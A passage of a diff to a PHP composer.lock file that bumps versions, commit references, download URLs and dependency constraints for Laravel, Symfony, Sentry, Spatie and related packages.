+                "reference": "82ecb6faa55fb20109e6959f42f0f652cd77674b",
                 "shasum": ""
             },
             "require": {
-                "illuminate/contracts": "^10.0|^11.0|^12.0",
-                "php": "^8.1"
+                "illuminate/contracts": "^11.0|^12.0|^13.0",
+                "php": "^8.2"
             },
             "require-dev": {
-                "orchestra/testbench": "^10.0",
-                "pestphp/pest": "^2.34|^3.0",
-                "phpunit/phpunit": "^10.5|^11.5"
+                "orchestra/testbench": "^9.0|^10.0|^11.0",
+                "pestphp/pest": "^3.0|^4.0",
+                "phpunit/phpunit": "^11.5|^12.0"
             },
             "type": "library",
             "extra": {
@@ -3770,7 +3771,7 @@
             ],
             "support": {
                 "issues": "https://github.com/lorisleiva/lody/issues",
-                "source": "https://github.com/lorisleiva/lody/tree/v0.6.0"
+                "source": "https://github.com/lorisleiva/lody/tree/v0.7.0"
             },
             "funding": [
                 {
@@ -3778,7 +3779,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2025-03-01T19:21:17+00:00"
+            "time": "2026-03-18T12:49:31+00:00"
         },
         {
             "name": "monolog/monolog",
@@ -3951,16 +3952,16 @@
         },
         {
             "name": "nesbot/carbon",
-            "version": "3.11.1",
+            "version": "3.11.3",
             "source": {
                 "type": "git",
                 "url": "https://github.com/CarbonPHP/carbon.git",
-                "reference": "f438fcc98f92babee98381d399c65336f3a3827f"
+                "reference": "6a7e652845bb018c668220c2a545aded8594fbbf"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/CarbonPHP/carbon/zipball/f438fcc98f92babee98381d399c65336f3a3827f",
-                "reference": "f438fcc98f92babee98381d399c65336f3a3827f",
+                "url": "https://api.github.com/repos/CarbonPHP/carbon/zipball/6a7e652845bb018c668220c2a545aded8594fbbf",
+                "reference": "6a7e652845bb018c668220c2a545aded8594fbbf",
                 "shasum": ""
             },
             "require": {
@@ -4052,7 +4053,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-01-29T09:26:29+00:00"
+            "time": "2026-03-11T17:23:39+00:00"
         },
         {
             "name": "nette/schema",
@@ -4958,16 +4959,16 @@
         },
         {
             "name": "phpdocumentor/reflection-docblock",
-            "version": "5.6.6",
+            "version": "5.6.7",
             "source": {
                 "type": "git",
                 "url": "https://github.com/phpDocumentor/ReflectionDocBlock.git",
-                "reference": "5cee1d3dfc2d2aa6599834520911d246f656bcb8"
+                "reference": "31a105931bc8ffa3a123383829772e832fd8d903"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/phpDocumentor/ReflectionDocBlock/zipball/5cee1d3dfc2d2aa6599834520911d246f656bcb8",
-                "reference": "5cee1d3dfc2d2aa6599834520911d246f656bcb8",
+                "url": "https://api.github.com/repos/phpDocumentor/ReflectionDocBlock/zipball/31a105931bc8ffa3a123383829772e832fd8d903",
+                "reference": "31a105931bc8ffa3a123383829772e832fd8d903",
                 "shasum": ""
             },
             "require": {
@@ -5016,9 +5017,9 @@
             "description": "With this component, a library can provide support for annotations via DocBlocks or otherwise retrieve information that is embedded in a DocBlock.",
             "support": {
                 "issues": "https://github.com/phpDocumentor/ReflectionDocBlock/issues",
-                "source": "https://github.com/phpDocumentor/ReflectionDocBlock/tree/5.6.6"
+                "source": "https://github.com/phpDocumentor/ReflectionDocBlock/tree/5.6.7"
             },
-            "time": "2025-12-22T21:13:58+00:00"
+            "time": "2026-03-18T20:47:46+00:00"
         },
         {
             "name": "phpdocumentor/type-resolver",
@@ -5155,16 +5156,16 @@
         },
         {
             "name": "phpseclib/phpseclib",
-            "version": "3.0.49",
+            "version": "3.0.50",
             "source": {
                 "type": "git",
                 "url": "https://github.com/phpseclib/phpseclib.git",
-                "reference": "6233a1e12584754e6b5daa69fe1289b47775c1b9"
+                "reference": "aa6ad8321ed103dc3624fb600a25b66ebf78ec7b"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/phpseclib/phpseclib/zipball/6233a1e12584754e6b5daa69fe1289b47775c1b9",
-                "reference": "6233a1e12584754e6b5daa69fe1289b47775c1b9",
+                "url": "https://api.github.com/repos/phpseclib/phpseclib/zipball/aa6ad8321ed103dc3624fb600a25b66ebf78ec7b",
+                "reference": "aa6ad8321ed103dc3624fb600a25b66ebf78ec7b",
                 "shasum": ""
             },
             "require": {
@@ -5245,7 +5246,7 @@
             ],
             "support": {
                 "issues": "https://github.com/phpseclib/phpseclib/issues",
-                "source": "https://github.com/phpseclib/phpseclib/tree/3.0.49"
+                "source": "https://github.com/phpseclib/phpseclib/tree/3.0.50"
             },
             "funding": [
                 {
@@ -5261,7 +5262,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-01-27T09:17:28+00:00"
+            "time": "2026-03-19T02:57:58+00:00"
         },
         {
             "name": "phpstan/phpdoc-parser",
@@ -5378,16 +5379,16 @@
         },
         {
             "name": "poliander/cron",
-            "version": "3.3.0",
+            "version": "3.3.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/poliander/cron.git",
-                "reference": "13892a8d7f90c7e93947f21e115037b6a0d979bd"
+                "reference": "8b6fc91b86de3d973f6ea16eda846f522ed1ce7a"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/poliander/cron/zipball/13892a8d7f90c7e93947f21e115037b6a0d979bd",
-                "reference": "13892a8d7f90c7e93947f21e115037b6a0d979bd",
+                "url": "https://api.github.com/repos/poliander/cron/zipball/8b6fc91b86de3d973f6ea16eda846f522ed1ce7a",
+                "reference": "8b6fc91b86de3d973f6ea16eda846f522ed1ce7a",
                 "shasum": ""
             },
             "require": {
@@ -5416,9 +5417,9 @@
             "homepage": "https://github.com/poliander/cron",
             "support": {
                 "issues": "https://github.com/poliander/cron/issues",
-                "source": "https://github.com/poliander/cron/tree/3.3.0"
+                "source": "https://github.com/poliander/cron/tree/3.3.1"
             },
-            "time": "2025-11-23T17:30:50+00:00"
+            "time": "2026-03-05T19:37:26+00:00"
         },
         {
             "name": "pragmarx/google2fa",
@@ -5935,16 +5936,16 @@
         },
         {
             "name": "psy/psysh",
-            "version": "v0.12.20",
+            "version": "v0.12.22",
             "source": {
                 "type": "git",
                 "url": "https://github.com/bobthecow/psysh.git",
-                "reference": "19678eb6b952a03b8a1d96ecee9edba518bb0373"
+                "reference": "3be75d5b9244936dd4ac62ade2bfb004d13acf0f"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/bobthecow/psysh/zipball/19678eb6b952a03b8a1d96ecee9edba518bb0373",
-                "reference": "19678eb6b952a03b8a1d96ecee9edba518bb0373",
+                "url": "https://api.github.com/repos/bobthecow/psysh/zipball/3be75d5b9244936dd4ac62ade2bfb004d13acf0f",
+                "reference": "3be75d5b9244936dd4ac62ade2bfb004d13acf0f",
                 "shasum": ""
             },
             "require": {
@@ -6008,9 +6009,9 @@
             ],
             "support": {
                 "issues": "https://github.com/bobthecow/psysh/issues",
-                "source": "https://github.com/bobthecow/psysh/tree/v0.12.20"
+                "source": "https://github.com/bobthecow/psysh/tree/v0.12.22"
             },
-            "time": "2026-02-11T15:05:28+00:00"
+            "time": "2026-03-22T23:03:24+00:00"
         },
         {
             "name": "purplepixie/phpdns",
@@ -6447,16 +6448,16 @@
         },
         {
             "name": "sentry/sentry",
-            "version": "4.21.0",
+            "version": "4.23.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/getsentry/sentry-php.git",
-                "reference": "2bf405fc4d38f00073a7d023cf321e59f614d54c"
+                "reference": "121a674d5fffcdb8e414b75c1b76edba8e592b66"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/getsentry/sentry-php/zipball/2bf405fc4d38f00073a7d023cf321e59f614d54c",
-                "reference": "2bf405fc4d38f00073a7d023cf321e59f614d54c",
+                "url": "https://api.github.com/repos/getsentry/sentry-php/zipball/121a674d5fffcdb8e414b75c1b76edba8e592b66",
+                "reference": "121a674d5fffcdb8e414b75c1b76edba8e592b66",
                 "shasum": ""
             },
             "require": {
@@ -6478,12 +6479,14 @@
                 "guzzlehttp/psr7": "^1.8.4|^2.1.1",
                 "monolog/monolog": "^1.6|^2.0|^3.0",
                 "nyholm/psr7": "^1.8",
+                "open-telemetry/api": "^1.0",
+                "open-telemetry/exporter-otlp": "^1.0",
+                "open-telemetry/sdk": "^1.0",
                 "phpbench/phpbench": "^1.0",
                 "phpstan/phpstan": "^1.3",
                 "phpunit/phpunit": "^8.5.52|^9.6.34",
                 "spiral/roadrunner-http": "^3.6",
-                "spiral/roadrunner-worker": "^3.6",
-                "vimeo/psalm": "^4.17"
+                "spiral/roadrunner-worker": "^3.6"
             },
             "suggest": {
                 "monolog/monolog": "Allow sending log messages to Sentry by using the included Monolog handler."
@@ -6522,7 +6525,7 @@
             ],
             "support": {
                 "issues": "https://github.com/getsentry/sentry-php/issues",
-                "source": "https://github.com/getsentry/sentry-php/tree/4.21.0"
+                "source": "https://github.com/getsentry/sentry-php/tree/4.23.0"
             },
             "funding": [
                 {
@@ -6534,38 +6537,39 @@
                     "type": "custom"
                 }
             ],
-            "time": "2026-02-24T15:32:51+00:00"
+            "time": "2026-03-23T13:15:52+00:00"
         },
         {
             "name": "sentry/sentry-laravel",
-            "version": "4.21.0",
+            "version": "4.24.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/getsentry/sentry-laravel.git",
-                "reference": "4b939116c2d3c5de328f23a5f1dfb97b40e0c17b"
+                "reference": "f823bd85e38e06cb4f1b7a82d48a2fc95320b31d"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/getsentry/sentry-laravel/zipball/4b939116c2d3c5de328f23a5f1dfb97b40e0c17b",
-                "reference": "4b939116c2d3c5de328f23a5f1dfb97b40e0c17b",
+                "url": "https://api.github.com/repos/getsentry/sentry-laravel/zipball/f823bd85e38e06cb4f1b7a82d48a2fc95320b31d",
+                "reference": "f823bd85e38e06cb4f1b7a82d48a2fc95320b31d",
                 "shasum": ""
             },
             "require": {
-                "illuminate/support": "^6.0 | ^7.0 | ^8.0 | ^9.0 | ^10.0 | ^11.0 | ^12.0",
+                "illuminate/support": "^6.0 | ^7.0 | ^8.0 | ^9.0 | ^10.0 | ^11.0 | ^12.0 | ^13.0",
                 "nyholm/psr7": "^1.0",
                 "php": "^7.2 | ^8.0",
-                "sentry/sentry": "^4.21.0",
+                "sentry/sentry": "^4.23.0",
                 "symfony/psr-http-message-bridge": "^1.0 | ^2.0 | ^6.0 | ^7.0 | ^8.0"
             },
             "require-dev": {
                 "friendsofphp/php-cs-fixer": "^3.11",
                 "guzzlehttp/guzzle": "^7.2",
                 "laravel/folio": "^1.1",
-                "laravel/framework": "^6.0 | ^7.0 | ^8.0 | ^9.0 | ^10.0 | ^11.0 | ^12.0",
+                "laravel/framework": "^6.0 | ^7.0 | ^8.0 | ^9.0 | ^10.0 | ^11.0 | ^12.0 | ^13.0",
+                "laravel/octane": "^2.15",
                 "laravel/pennant": "^1.0",
-                "livewire/livewire": "^2.0 | ^3.0",
+                "livewire/livewire": "^2.0 | ^3.0 | ^4.0",
                 "mockery/mockery": "^1.3",
-                "orchestra/testbench": "^4.7 | ^5.1 | ^6.0 | ^7.0 | ^8.0 | ^9.0 | ^10.0",
+                "orchestra/testbench": "^4.7 | ^5.1 | ^6.0 | ^7.0 | ^8.0 | ^9.0 | ^10.0 | ^11.0",
                 "phpstan/phpstan": "^1.10",
                 "phpunit/phpunit": "^8.5 | ^9.6 | ^10.4 | ^11.5"
             },
@@ -6612,7 +6616,7 @@
             ],
             "support": {
                 "issues": "https://github.com/getsentry/sentry-laravel/issues",
-                "source": "https://github.com/getsentry/sentry-laravel/tree/4.21.0"
+                "source": "https://github.com/getsentry/sentry-laravel/tree/4.24.0"
             },
             "funding": [
                 {
@@ -6624,7 +6628,7 @@
                     "type": "custom"
                 }
             ],
-            "time": "2026-02-26T16:08:52+00:00"
+            "time": "2026-03-24T10:33:54+00:00"
         },
         {
             "name": "socialiteproviders/authentik",
@@ -6870,22 +6874,22 @@
         },
         {
             "name": "socialiteproviders/manager",
-            "version": "v4.8.1",
+            "version": "4.9.2",
             "source": {
                 "type": "git",
                 "url": "https://github.com/SocialiteProviders/Manager.git",
-                "reference": "8180ec14bef230ec2351cff993d5d2d7ca470ef4"
+                "reference": "35372dc62787e61e91cfec73f45fd5d5ae0f8891"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/SocialiteProviders/Manager/zipball/8180ec14bef230ec2351cff993d5d2d7ca470ef4",
-                "reference": "8180ec14bef230ec2351cff993d5d2d7ca470ef4",
+                "url": "https://api.github.com/repos/SocialiteProviders/Manager/zipball/35372dc62787e61e91cfec73f45fd5d5ae0f8891",
+                "reference": "35372dc62787e61e91cfec73f45fd5d5ae0f8891",
                 "shasum": ""
             },
             "require": {
-                "illuminate/support": "^8.0 || ^9.0 || ^10.0 || ^11.0 || ^12.0",
+                "illuminate/support": "^11.0 || ^12.0 || ^13.0",
                 "laravel/socialite": "^5.5",
-                "php": "^8.1"
+                "php": "^8.2"
             },
             "require-dev": {
                 "mockery/mockery": "^1.2",
@@ -6940,7 +6944,7 @@
                 "issues": "https://github.com/socialiteproviders/manager/issues",
                 "source": "https://github.com/socialiteproviders/manager"
             },
-            "time": "2025-02-24T19:33:30+00:00"
+            "time": "2026-03-18T22:13:24+00:00"
         },
         {
             "name": "socialiteproviders/microsoft-azure",
@@ -7045,16 +7049,16 @@
         },
         {
             "name": "spatie/backtrace",
-            "version": "1.8.1",
+            "version": "1.8.2",
             "source": {
                 "type": "git",
                 "url": "https://github.com/spatie/backtrace.git",
-                "reference": "8c0f16a59ae35ec8c62d85c3c17585158f430110"
+                "reference": "8ffe78be5ed355b5009e3dd989d183433e9a5adc"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/spatie/backtrace/zipball/8c0f16a59ae35ec8c62d85c3c17585158f430110",
-                "reference": "8c0f16a59ae35ec8c62d85c3c17585158f430110",
+                "url": "https://api.github.com/repos/spatie/backtrace/zipball/8ffe78be5ed355b5009e3dd989d183433e9a5adc",
+                "reference": "8ffe78be5ed355b5009e3dd989d183433e9a5adc",
                 "shasum": ""
             },
             "require": {
@@ -7065,7 +7069,7 @@
                 "laravel/serializable-closure": "^1.3 || ^2.0",
                 "phpunit/phpunit": "^9.3 || ^11.4.3",
                 "spatie/phpunit-snapshot-assertions": "^4.2 || ^5.1.6",
-                "symfony/var-dumper": "^5.1 || ^6.0 || ^7.0"
+                "symfony/var-dumper": "^5.1|^6.0|^7.0|^8.0"
             },
             "type": "library",
             "autoload": {
@@ -7093,7 +7097,7 @@
             ],
             "support": {
                 "issues": "https://github.com/spatie/backtrace/issues",
-                "source": "https://github.com/spatie/backtrace/tree/1.8.1"
+                "source": "https://github.com/spatie/backtrace/tree/1.8.2"
             },
             "funding": [
                 {
@@ -7105,7 +7109,7 @@
                     "type": "other"
                 }
             ],
-            "time": "2025-08-26T08:22:30+00:00"
+            "time": "2026-03-11T13:48:28+00:00"
         },
         {
             "name": "spatie/commonmark-shiki-highlighter",
@@ -7169,16 +7173,16 @@
         },
         {
             "name": "spatie/laravel-activitylog",
-            "version": "4.12.1",
+            "version": "4.12.3",
             "source": {
                 "type": "git",
                 "url": "https://github.com/spatie/laravel-activitylog.git",
-                "reference": "bf66b5bbe9a946e977e876420d16b30b9aff1b2d"
+                "reference": "2a2024fcac05628b0d1bfdbb1b94dda8b0661dc0"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/spatie/laravel-activitylog/zipball/bf66b5bbe9a946e977e876420d16b30b9aff1b2d",
-                "reference": "bf66b5bbe9a946e977e876420d16b30b9aff1b2d",
+                "url": "https://api.github.com/repos/spatie/laravel-activitylog/zipball/2a2024fcac05628b0d1bfdbb1b94dda8b0661dc0",
+                "reference": "2a2024fcac05628b0d1bfdbb1b94dda8b0661dc0",
                 "shasum": ""
             },
             "require": {
@@ -7244,7 +7248,7 @@
             ],
             "support": {
                 "issues": "https://github.com/spatie/laravel-activitylog/issues",
-                "source": "https://github.com/spatie/laravel-activitylog/tree/4.12.1"
+                "source": "https://github.com/spatie/laravel-activitylog/tree/4.12.3"
             },
             "funding": [
                 {
@@ -7256,20 +7260,20 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-02-22T08:37:18+00:00"
+            "time": "2026-03-24T12:33:53+00:00"
         },
         {
             "name": "spatie/laravel-data",
-            "version": "4.20.0",
+            "version": "4.20.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/spatie/laravel-data.git",
-                "reference": "05b792ab0e059d26eca15d47d199ba6f4c96054e"
+                "reference": "5490cb15de6fc8b35a8cd2f661fac072d987a1ad"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/spatie/laravel-data/zipball/05b792ab0e059d26eca15d47d199ba6f4c96054e",
-                "reference": "05b792ab0e059d26eca15d47d199ba6f4c96054e",
+                "url": "https://api.github.com/repos/spatie/laravel-data/zipball/5490cb15de6fc8b35a8cd2f661fac072d987a1ad",
+                "reference": "5490cb15de6fc8b35a8cd2f661fac072d987a1ad",
                 "shasum": ""
             },
             "require": {
@@ -7330,7 +7334,7 @@
             ],
             "support": {
                 "issues": "https://github.com/spatie/laravel-data/issues",
-                "source": "https://github.com/spatie/laravel-data/tree/4.20.0"
+                "source": "https://github.com/spatie/laravel-data/tree/4.20.1"
             },
             "funding": [
                 {
@@ -7338,7 +7342,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-02-25T16:18:18+00:00"
+            "time": "2026-03-18T07:44:01+00:00"
         },
         {
             "name": "spatie/laravel-markdown",
@@ -7479,16 +7483,16 @@
         },
         {
             "name": "spatie/laravel-ray",
-            "version": "1.43.6",
+            "version": "1.43.7",
             "source": {
                 "type": "git",
                 "url": "https://github.com/spatie/laravel-ray.git",
-                "reference": "117a4addce2cb8adfc01b864435b5b278e2f0c40"
+                "reference": "d550d0b5bf87bb1b1668089f3c843e786ee522d3"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/spatie/laravel-ray/zipball/117a4addce2cb8adfc01b864435b5b278e2f0c40",
-                "reference": "117a4addce2cb8adfc01b864435b5b278e2f0c40",
+                "url": "https://api.github.com/repos/spatie/laravel-ray/zipball/d550d0b5bf87bb1b1668089f3c843e786ee522d3",
+                "reference": "d550d0b5bf87bb1b1668089f3c843e786ee522d3",
                 "shasum": ""
             },
             "require": {
@@ -7502,7 +7506,7 @@
                 "spatie/backtrace": "^1.7.1",
                 "spatie/ray": "^1.45.0",
                 "symfony/stopwatch": "4.2|^5.1|^6.0|^7.0|^8.0",
-                "zbateson/mail-mime-parser": "^1.3.1|^2.0|^3.0"
+                "zbateson/mail-mime-parser": "^1.3.1|^2.0|^3.0|^4.0"
             },
             "require-dev": {
                 "guzzlehttp/guzzle": "^7.3",
@@ -7552,7 +7556,7 @@
             ],
             "support": {
                 "issues": "https://github.com/spatie/laravel-ray/issues",
-                "source": "https://github.com/spatie/laravel-ray/tree/1.43.6"
+                "source": "https://github.com/spatie/laravel-ray/tree/1.43.7"
             },
             "funding": [
                 {
@@ -7564,7 +7568,7 @@
                     "type": "other"
                 }
             ],
-            "time": "2026-02-19T10:24:51+00:00"
+            "time": "2026-03-06T08:19:04+00:00"
         },
         {
             "name": "spatie/laravel-schemaless-attributes",
@@ -7986,27 +7990,27 @@
         },
         {
             "name": "stevebauman/purify",
-            "version": "v6.3.1",
+            "version": "v6.3.2",
             "source": {
                 "type": "git",
                 "url": "https://github.com/stevebauman/purify.git",
-                "reference": "3acb5e77904f420ce8aad8fa1c7f394e82daa500"
+                "reference": "deba4aa55a45a7593c369b52d481c87b545a5bf8"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/stevebauman/purify/zipball/3acb5e77904f420ce8aad8fa1c7f394e82daa500",
-                "reference": "3acb5e77904f420ce8aad8fa1c7f394e82daa500",
+                "url": "https://api.github.com/repos/stevebauman/purify/zipball/deba4aa55a45a7593c369b52d481c87b545a5bf8",
+                "reference": "deba4aa55a45a7593c369b52d481c87b545a5bf8",
                 "shasum": ""
             },
             "require": {
                 "ezyang/htmlpurifier": "^4.17",
-                "illuminate/contracts": "^7.0|^8.0|^9.0|^10.0|^11.0|^12.0",
-                "illuminate/support": "^7.0|^8.0|^9.0|^10.0|^11.0|^12.0",
+                "illuminate/contracts": "^7.0|^8.0|^9.0|^10.0|^11.0|^12.0|^13.0",
+                "illuminate/support": "^7.0|^8.0|^9.0|^10.0|^11.0|^12.0|^13.0",
                 "php": ">=7.4"
             },
             "require-dev": {
-                "orchestra/testbench": "^5.0|^6.0|^7.0|^8.0|^9.0|^10.0",
-                "phpunit/phpunit": "^8.0|^9.0|^10.0|^11.5.3"
+                "orchestra/testbench": "^5.0|^6.0|^7.0|^8.0|^9.0|^10.0|^11.0",
+                "phpunit/phpunit": "^8.0|^9.0|^10.0|^11.5.3|^12.5.12"
             },
             "type": "library",
             "extra": {
@@ -8046,9 +8050,9 @@
             ],
             "support": {
                 "issues": "https://github.com/stevebauman/purify/issues",
-                "source": "https://github.com/stevebauman/purify/tree/v6.3.1"
+                "source": "https://github.com/stevebauman/purify/tree/v6.3.2"
             },
-            "time": "2025-05-21T16:53:09+00:00"
+            "time": "2026-03-18T16:42:42+00:00"
         },
         {
             "name": "stripe/stripe-php",
@@ -8188,16 +8192,16 @@
         },
         {
             "name": "symfony/console",
-            "version": "v7.4.6",
+            "version": "v7.4.7",
             "source": {
                 "type": "git",
                 "url": "https://github.com/symfony/console.git",
-                "reference": "6d643a93b47398599124022eb24d97c153c12f27"
+                "reference": "e1e6770440fb9c9b0cf725f81d1361ad1835329d"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/symfony/console/zipball/6d643a93b47398599124022eb24d97c153c12f27",
-                "reference": "6d643a93b47398599124022eb24d97c153c12f27",
+                "url": "https://api.github.com/repos/symfony/console/zipball/e1e6770440fb9c9b0cf725f81d1361ad1835329d",
+                "reference": "e1e6770440fb9c9b0cf725f81d1361ad1835329d",
                 "shasum": ""
             },
             "require": {
@@ -8262,7 +8266,7 @@
                 "terminal"
             ],
             "support": {
-                "source": "https://github.com/symfony/console/tree/v7.4.6"
+                "source": "https://github.com/symfony/console/tree/v7.4.7"
             },
             "funding": [
                 {
@@ -8282,7 +8286,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-02-25T17:02:47+00:00"
+            "time": "2026-03-06T14:06:20+00:00"
         },
         {
             "name": "symfony/css-selector",
@@ -8803,16 +8807,16 @@
         },
         {
             "name": "symfony/http-foundation",
-            "version": "v7.4.6",
+            "version": "v7.4.7",
             "source": {
                 "type": "git",
                 "url": "https://github.com/symfony/http-foundation.git",
-                "reference": "fd97d5e926e988a363cef56fbbf88c5c528e9065"
+                "reference": "f94b3e7b7dafd40e666f0c9ff2084133bae41e81"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/symfony/http-foundation/zipball/fd97d5e926e988a363cef56fbbf88c5c528e9065",
-                "reference": "fd97d5e926e988a363cef56fbbf88c5c528e9065",
+                "url": "https://api.github.com/repos/symfony/http-foundation/zipball/f94b3e7b7dafd40e666f0c9ff2084133bae41e81",
+                "reference": "f94b3e7b7dafd40e666f0c9ff2084133bae41e81",
                 "shasum": ""
             },
             "require": {
@@ -8861,7 +8865,7 @@
             "description": "Defines an object-oriented layer for the HTTP specification",
             "homepage": "https://symfony.com",
             "support": {
-                "source": "https://github.com/symfony/http-foundation/tree/v7.4.6"
+                "source": "https://github.com/symfony/http-foundation/tree/v7.4.7"
             },
             "funding": [
                 {
@@ -8881,20 +8885,20 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-02-21T16:25:55+00:00"
+            "time": "2026-03-06T13:15:18+00:00"
         },
         {
             "name": "symfony/http-kernel",
-            "version": "v7.4.6",
+            "version": "v7.4.7",
             "source": {
                 "type": "git",
                 "url": "https://github.com/symfony/http-kernel.git",
-                "reference": "002ac0cf4cd972a7fd0912dcd513a95e8a81ce83"
+                "reference": "3b3fcf386c809be990c922e10e4c620d6367cab1"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/symfony/http-kernel/zipball/002ac0cf4cd972a7fd0912dcd513a95e8a81ce83",
-                "reference": "002ac0cf4cd972a7fd0912dcd513a95e8a81ce83",
+                "url": "https://api.github.com/repos/symfony/http-kernel/zipball/3b3fcf386c809be990c922e10e4c620d6367cab1",
+                "reference": "3b3fcf386c809be990c922e10e4c620d6367cab1",
                 "shasum": ""
             },
             "require": {
@@ -8980,7 +8984,7 @@
             "description": "Provides a structured process for converting a Request into a Response",
             "homepage": "https://symfony.com",
             "support": {
-                "source": "https://github.com/symfony/http-kernel/tree/v7.4.6"
+                "source": "https://github.com/symfony/http-kernel/tree/v7.4.7"
             },
             "funding": [
                 {
@@ -9000,7 +9004,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-02-26T08:30:57+00:00"
+            "time": "2026-03-06T16:33:18+00:00"
         },
         {
             "name": "symfony/mailer",
@@ -9088,16 +9092,16 @@
         },
         {
             "name": "symfony/mime",
-            "version": "v7.4.6",
+            "version": "v7.4.7",
             "source": {
                 "type": "git",
                 "url": "https://github.com/symfony/mime.git",
-                "reference": "9fc881d95feae4c6c48678cb6372bd8a7ba04f5f"
+                "reference": "da5ab4fde3f6c88ab06e96185b9922f48b677cd1"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/symfony/mime/zipball/9fc881d95feae4c6c48678cb6372bd8a7ba04f5f",
-                "reference": "9fc881d95feae4c6c48678cb6372bd8a7ba04f5f",
+                "url": "https://api.github.com/repos/symfony/mime/zipball/da5ab4fde3f6c88ab06e96185b9922f48b677cd1",
+                "reference": "da5ab4fde3f6c88ab06e96185b9922f48b677cd1",
                 "shasum": ""
             },
             "require": {
@@ -9153,7 +9157,7 @@
                 "mime-type"
             ],
             "support": {
-                "source": "https://github.com/symfony/mime/tree/v7.4.6"
+                "source": "https://github.com/symfony/mime/tree/v7.4.7"
             },
             "funding": [
                 {
@@ -9173,7 +9177,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-02-05T15:57:06+00:00"
+            "time": "2026-03-05T15:24:09+00:00"
         },
         {
             "name": "symfony/options-resolver",
@@ -11508,31 +11512,31 @@
         },
         {
             "name": "zbateson/mail-mime-parser",
-            "version": "3.0.5",
+            "version": "4.0.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/zbateson/mail-mime-parser.git",
-                "reference": "ff054c8e05310c445c2028c6128a4319cc9f6aa8"
+                "reference": "3db681988a48fdffdba551dcc6b2f4c2da574540"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/zbateson/mail-mime-parser/zipball/ff054c8e05310c445c2028c6128a4319cc9f6aa8",
-                "reference": "ff054c8e05310c445c2028c6128a4319cc9f6aa8",
+                "url": "https://api.github.com/repos/zbateson/mail-mime-parser/zipball/3db681988a48fdffdba551dcc6b2f4c2da574540",
+                "reference": "3db681988a48fdffdba551dcc6b2f4c2da574540",
                 "shasum": ""
             },
             "require": {
                 "guzzlehttp/psr7": "^2.5",
-                "php": ">=8.0",
+                "php": ">=8.1",
                 "php-di/php-di": "^6.0|^7.0",
                 "psr/log": "^1|^2|^3",
-                "zbateson/mb-wrapper": "^2.0",
-                "zbateson/stream-decorators": "^2.1"
+                "zbateson/mb-wrapper": "^2.0 || ^3.0",
+                "zbateson/stream-decorators": "^2.1 || ^3.0"
             },
             "require-dev": {
-                "friendsofphp/php-cs-fixer": "*",
+                "friendsofphp/php-cs-fixer": "^3.0",
                 "monolog/monolog": "^2|^3",
-                "phpstan/phpstan": "*",
-                "phpunit/phpunit": "^9.6"
+                "phpstan/phpstan": "^2.0",
+                "phpunit/phpunit": "^10.5"
             },
             "suggest": {
                 "ext-iconv": "For best support/performance",
@@ -11580,31 +11584,31 @@
                     "type": "github"
                 }
             ],
-            "time": "2025-12-02T00:29:16+00:00"
+            "time": "2026-03-11T18:03:41+00:00"
         },
         {
             "name": "zbateson/mb-wrapper",
-            "version": "2.0.1",
+            "version": "3.0.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/zbateson/mb-wrapper.git",
-                "reference": "50a14c0c9537f978a61cde9fdc192a0267cc9cff"
+                "reference": "f0ee6af2712e92e52ee2552588cd69d21ab3363f"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/zbateson/mb-wrapper/zipball/50a14c0c9537f978a61cde9fdc192a0267cc9cff",
-                "reference": "50a14c0c9537f978a61cde9fdc192a0267cc9cff",
+                "url": "https://api.github.com/repos/zbateson/mb-wrapper/zipball/f0ee6af2712e92e52ee2552588cd69d21ab3363f",
+                "reference": "f0ee6af2712e92e52ee2552588cd69d21ab3363f",
                 "shasum": ""
             },
             "require": {
-                "php": ">=8.0",
+                "php": ">=8.1",
                 "symfony/polyfill-iconv": "^1.9",
                 "symfony/polyfill-mbstring": "^1.9"
             },
             "require-dev": {
                 "friendsofphp/php-cs-fixer": "*",
                 "phpstan/phpstan": "*",
-                "phpunit/phpunit": "^9.6|^10.0"
+                "phpunit/phpunit": "^10.0|^11.0"
             },
             "suggest": {
                 "ext-iconv": "For best support/performance",
@@ -11641,7 +11645,7 @@
             ],
             "support": {
                 "issues": "https://github.com/zbateson/mb-wrapper/issues",
-                "source": "https://github.com/zbateson/mb-wrapper/tree/2.0.1"
+                "source": "https://github.com/zbateson/mb-wrapper/tree/3.0.0"
             },
             "funding": [
                 {
@@ -11649,31 +11653,31 @@
                     "type": "github"
                 }
             ],
-            "time": "2024-12-20T22:05:33+00:00"
+            "time": "2026-02-13T19:33:26+00:00"
         },
         {
